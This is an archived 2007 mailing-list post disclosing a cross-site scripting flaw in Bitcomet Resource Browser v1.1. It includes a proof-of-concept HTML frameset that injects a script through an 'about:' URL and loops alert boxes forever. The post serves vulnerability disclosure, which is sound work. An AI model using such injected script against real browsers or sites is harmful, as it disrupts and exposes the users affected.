|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Bitcomet Resource Browser v1.1 XSS
jplopezy
gmail.com
Date: Fri Nov 23 2007 - 22:33:40 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity.
Create an html file and paste the following code
<html>
<frameset rows="100%">
<frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>">
</frameset>
</html>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]